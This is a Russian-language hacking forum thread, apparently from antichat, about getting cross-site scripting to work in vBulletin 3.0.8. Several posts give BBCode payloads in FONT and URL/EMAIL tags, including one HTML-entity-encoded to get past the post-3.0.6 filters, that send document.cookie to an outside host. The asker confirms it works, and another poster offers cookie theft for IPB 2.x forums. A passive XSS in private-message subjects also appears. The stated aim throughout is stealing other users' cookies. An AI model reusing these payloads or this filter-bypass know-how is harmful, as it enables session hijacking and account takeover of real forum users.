|
Есть ли XSS в vBulletin 3.0.8 ?
Если какие-нибуль Xss? Пробывал для предыдущих версий (описанных на форуме) ничего не работает. Жду вашим комментариев и советов.
|
Цитата:
http://forum.antichat.ru/thread11807.html |
2 Him@s, неа :( Просто выводит вот такой текст:
[FONT=Arial size=20 style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); / ]wj" target="_blank">http://www.]wj А http://www.] стает линком на http://www.]/ и все |
Может в твоем HTML коде нужно что-то заменить или убрать? :confused:
|
так правильно...тока для начала ты его закодируй:
http://www.h4cky0u.org/encrypt/index.php |
Все или часть? И какую кодировку выбирать? Можешь уже сюда кинуть закодированный код?
|
ты его проверял? :(
У меня вот что в сообщение пишет: wj" target="_blank">http://www.][FONT=Arial style=d...41; / ]wj http://www.] - является ссылкой на http://www.]/ :(((((( ЗЫ.. + перед документ.кукис не убрал.. знаю что там он нуже.. и пишет то что я выше написал. |
у меня на локалхосте, я там пробую... могу дать ссылку на дистрибутив
http://vbulletin.net.ru Вот здесь скачай 3.0.8 |
что никто так помочь и не сможет? :(
|
vBulletin 3.0.3:
Код HTML:
[ EMAIL=[ URL= as=`s@wew.ew]mailto:assss@wew.ew ] |
Там много квадратных скобок.. убрал после первой, перед Email, и после второй, перед Url, но всеравно не работает :(
|
Что значит не работает ?? Какой результирующий HTML ?
В слове javascrp t - перед t - табуляция. |
Vrode tyt esche probel nado ubrat "ew ]" esli ya ne oshibaus.
|
mailto:assss@wew.ew ]
sssssssssssssssssssssssssss[/URL]` style=`background:url(javascript:alert(/Hi_from_Algol/))` Вот так выводит и все :( |
Цитата:
|
Кстати еще должен быть пассивыный XSS в теме письма:
Код:
Тема ПМ<script>alert()</script> |
Цитата:
После версии 3.0.6, фильтры очень сильно изменились. Код HTML:
[URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/FONT][/url][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ][/FONT][/URL]Эту строку Цитата:
А вообще пора бы этот код сделать чтобы работал для всех браузеров. Я как приду, напишу тебе чтобы работало не только в ИЕ, но и в Опере и в Фаерфокс. |
Отлично... просто класс, все действительно работает! Очень благодарен, спасибо большое!!! Если можешь - напиши чтобы работало и в остальных браузерах, буду ждать! Еще раз огромное спасибо!
|
Цитата:
Цитата:
Все параметры тоже закодируй. |
Кстати, тем кому надо чтобы можно было воровать куки в Фаерфоксе на форумах IPB от 2.* до 2.1.3, то вот вам код:
Цитата:
В версии 2.1.4 теги пост и топик уже пропаченны из-за того, что один человечек на меня настукал компании Инвизион, но как всегда, есть и другие теги, так что не беда. :rolleyes: |
Класс!!! Джордан ты лучший!!! Если можешь свяжись со мной, очень нужно, fogorm@ua.fm, пошли сюды свою асю, или если можешь здесь письмом отправь.
|
271297145
|
| Время: 09:28 |